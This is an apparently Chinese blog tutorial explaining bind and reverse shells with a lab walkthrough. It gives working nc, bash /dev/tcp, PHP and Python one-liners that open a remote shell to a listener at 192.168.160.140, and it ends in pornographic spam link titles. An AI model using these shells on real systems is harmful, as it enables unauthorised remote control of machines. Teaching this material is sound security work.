<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          3分鐘搞懂反彈shell

          共 1751字,需瀏覽 4分鐘

           ·

          2020-08-06 18:29

          實(shí)際上,很早很早以前就聽說過反彈shell,我最早做的網(wǎng)絡(luò)安全實(shí)驗(yàn)就開始反彈shell。比如這個(gè)知乎live中的第三個(gè)實(shí)驗(yàn)TCP會話劫持,就反彈了shell。一年前在與攻防團(tuán)隊(duì)的交流會上,再次聽到反彈shell,當(dāng)時(shí)也沒放在心上,反正挺重要的。直到今天,才算徹底明白反彈shell是咋回事。如果用一句話概述,那么反彈shell就是:



          黑客控制了目標(biāo),彈一個(gè)shell,構(gòu)建一個(gè)穩(wěn)定的通信后門????
          正向shell:客戶端想要獲得服務(wù)端的shell
          • 假設(shè)小黑是一名黑客

          • 他悄咪咪溜進(jìn)了知乎總部大樓,發(fā)現(xiàn)一臺劉看山的電腦,但是劉看山出門了

          • 于是小黑通過nc將這臺電腦的控制權(quán)通過23333端口發(fā)射出去

          • 小黑做了一系列的操作,又悄咪咪的原路返航

          • 回到家后,通過nc連上劉看山的電腦

          • 后來,劉看山的隱私泄露了~

          • (這里小黑是客戶端,劉看山是服務(wù)端,服務(wù)端發(fā)射shell)

          反向shell:服務(wù)端想要獲得客戶端的shell(也就是反彈shell)
          • 假設(shè)小黑是一名黑客

          • 他悄咪咪溜進(jìn)了知乎總部大樓,發(fā)現(xiàn)一臺劉看山的電腦,但是劉看山出門了

          • 小黑發(fā)現(xiàn)電腦里有一個(gè)有趣的文件(劉看山的秘密)

          • 小黑下載這個(gè)文件到自己的U盤里,又悄咪咪的原路返航

          • 回到家后,小黑打開這個(gè)文件

          • 發(fā)現(xiàn)電腦被劉看山控制了~

          • (這里小黑是客戶端,劉看山是服務(wù)端,客戶端發(fā)射shell)

          正向shell(服務(wù)端送shell)
          • 第一步:在kali rolling(服務(wù)端)上監(jiān)聽23333端口,并反彈shell

          nc -lvp 23333 -e /bin/sh




          • 第二步:在ubuntu18(客戶端)上連接kali rolling的23333端口

          • 這個(gè)時(shí)候,客戶端就拿到服務(wù)端的shell控制權(quán)了

          • 可以隨意控制服務(wù)端

          nc 192.168.160.140 23333



          反向shell(客戶端送shell)
          • 第一步:在ubuntu18上選擇增強(qiáng)版的netcat

          • 一般ubuntu默認(rèn)的是free-bsd版本的nc

          update-alternatives --config nc
          • 第二步:在kali rolling上啟動(dòng)服務(wù)端,等待客戶端上鉤

          • 客戶端只要吃鉤子,服務(wù)端就獲得了客戶端的shell控制權(quán)

          • 可以隨意控制客戶端

          nc -lvp 23333
          • 第三步:在ubuntu18上啟動(dòng)客戶端,吃鉤子

          nc 192.168.160.140 23333 -e /bin/sh
          • 我們發(fā)現(xiàn)必須客戶端和服務(wù)端都安裝了nc才能實(shí)現(xiàn)反彈shell(反向shell)

          • 但是如果其中一方?jīng)]有安裝nc怎么辦?

          bash反彈shell
          • 服務(wù)端(kali rolling上監(jiān)聽23333)

          • 客戶端吃鉤子,服務(wù)端就成功控制客戶端了

          • 客戶端(ubuntu18上bash反彈shell)

          bash -i >& /dev/tcp/192.168.160.140/23333 0>&1
          php反彈shell
          • 服務(wù)端(kali rolling上監(jiān)聽23333)

          • 客戶端吃鉤子,服務(wù)端就成功控制客戶端了

          • 客戶端(ubuntu18上bash反彈shell)

          php -r '$f=fsockopen("192.168.160.140",23333);exec("/bin/sh -i <&3 >&3 2>&3");'
          python反彈shell
          • 服務(wù)端(kali rolling上監(jiān)聽23333)

          • 客戶端吃鉤子,服務(wù)端就成功控制客戶端了

          • 客戶端(ubuntu18上bash反彈shell)

          python -c 'import socket,subprocess,os; \
          s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
          s.connect(("192.168.160.140",23333));
          os.dup2(s.fileno(),0);
          os.dup2(s.fileno(),1);
          os.dup2(s.fileno(),2);
          p=subprocess.call(["/bin/sh","-i"]);'

          本篇完~


          瀏覽 104
          點(diǎn)贊
          評論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          評論
          圖片
          表情
          推薦
          點(diǎn)贊
          評論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  淫欲少妇做爱高潮视频 | 国产一卡二卡三卡四卡在线 | 天天操狠狠操 | 婷婷精品在线 | 91黄色操逼视频 |